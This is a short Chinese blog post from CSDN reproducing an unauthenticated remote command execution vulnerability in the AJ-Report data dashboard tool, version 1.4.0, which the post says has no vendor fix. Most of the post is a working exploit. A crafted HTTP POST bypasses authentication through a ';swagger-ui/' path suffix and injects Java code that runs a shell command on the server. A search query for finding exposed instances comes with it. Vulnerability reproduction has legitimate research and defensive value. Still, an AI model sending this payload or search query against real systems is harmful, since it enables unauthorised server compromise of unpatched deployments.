开源数据大屏AJ-Report远程命令执行漏洞复现

于 2024-08-21 17:19:05 发布
阅读量23 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141398503
版权
0x01 漏洞描述:

系统/verification接口中存在任意命令执行,未经身份验证的远程攻击者可通过改漏洞执行任意代码,写入后门,获取服务器权限等。

0x02 影响版本:

最新版本v1.4.0

0x03 搜索语句:

title="AJ-Report"

0x04 漏洞复现:

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

0x05 修复建议

厂商暂未发布修复版本,建议放置内网使用,避免互联网端暴露

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具。三步快速完成大屏:配置数据源---->写SQL配置.zip
03-04
AJ-Report是一款强大的开源可视化设计工具,专为简化大数据展示和分析而打造。这款工具的特点在于其拖拽编辑功能,使得非技术背景的用户也能轻松上手,快速构建出专业的大屏展示。通过AJ-Report,用户只需经历三个...
AJ-Report一个完全开源,拖拽编辑的可视化设计工具 三步快速完成大屏:配置数据源->写SQL配置数据集->拖拽生成大屏
05-29
AJ-Report是一款强大的开源报表工具,专为满足企业对数据可视化和大屏设计的需求而设计。这款工具的核心特性在于其拖拽编辑功能,使得非技术人员也能轻松构建专业的大数据分析展示界面。通过简单易用的三步流程,...
基于 SpringBoot + Vue 实现的可视化拖拽编辑的大屏项目-AJ-Report
05-09
AJ-Report由 安吉加加 开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。     多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,支持17种...
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具
04-14
AJ-Report是一款强大的开源报表工具,专为程序员和数据分析人员设计,它提供了便捷的拖拽式界面,使得用户无需深入编码就能快速创建出专业的大屏可视化报告。这款工具的亮点在于其完全开源的特性,允许开发者根据...
AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑.rar
06-30
AJ-Report由 安吉加加 开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。 多数据源支持,内置 mysql 、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,支持17种...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1095
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 681
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
2024年杭州市网络与信息安全管理员(网络安全管理员)职业技能竞赛的通知
Geek极安云科-致力于网络安全事业
08-16 622
竞赛由理论知识和操作技能两部分组成,均采用百分制,小数点后保留两位,60分(含)以上为合格。荣获竞赛一等奖、二等奖的选手,由杭州市人力社保局认定为“杭州市技术能手”,若有不符合认定条件的选手,不再递补;本次竞赛依据《网络与信息安全管理员(网络安全管理员)国家职业技能标准》三级(高级工)等级要求确定技术标准,编制技术文件和命题,适当增加相关新知识、新技术、新技能等内容。1.各区、县(市),有关产业工会,要高度重视此次竞赛,积极发动、广泛宣传、认真组织、严格选拔,推荐综合素质较好、技能水平较高的人员参赛。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-20 292
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全漏洞挖掘:IDOR实例
等风来
08-19 83
点击Documents > Download后,应用程序将执行 HTTP GET 请求
Web安全:SqlMap工具
qq_55038440的博客
08-16 1053
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
SQL注入(cookie、base64、dnslog外带、搜索型注入)
m0_74249600的博客
08-13 1181
本文讲述了cookie注入、base64注入、dnslog外带、搜索型注入等sql注入的基本注入类型,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
【网络安全】密码重置中毒实现账户接管
等风来
08-15 196
我输入了新密码,点击“重置密码”。然后,我被导航到登录页面,在那里我输入了电子邮件和新密码,最后成功登录了账户,说明此漏洞是有效的。
网络安全之XSS基础
huizhaohaha的博客
08-19 724
是RCDATA元素(RCDATA elements),可以容纳文本和字符引用,注意不能容纳其他元素,HTML解码得到<textarea><script>alert(5)</script>
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-16 1814
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
24年上半年天融信营收缩减1.8亿,亏损2.06亿
liguangyao213的博客
08-17 703
吉祥知识星球《网安面试指南》本周四天融信发布《2024 年半年度报告》
靶机:DC-4
weixin_52953960的博客
08-13 483
在 /var/mail 下有一封信,发现 charles 用户的密码。teehee是个小众的linux编辑器,执行以下命令,成功提权。查看 /etc/passwd 文件。sudo -l 看一下,不知道密码。在 jim 用户下发现密码文件。查看具有 root 权限的命令。访问80端口,发现登录页面。切换为交互式shell。使用 hydra 破解。bp抓包,是命令执行
【网络安全】密码重置中毒漏洞解析
等风来
08-15 188
密码重置投毒是一种技术,攻击者利用该技术操纵易受攻击的网站,窃取重置任意用户密码所需的令牌,并最终盗取其帐户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值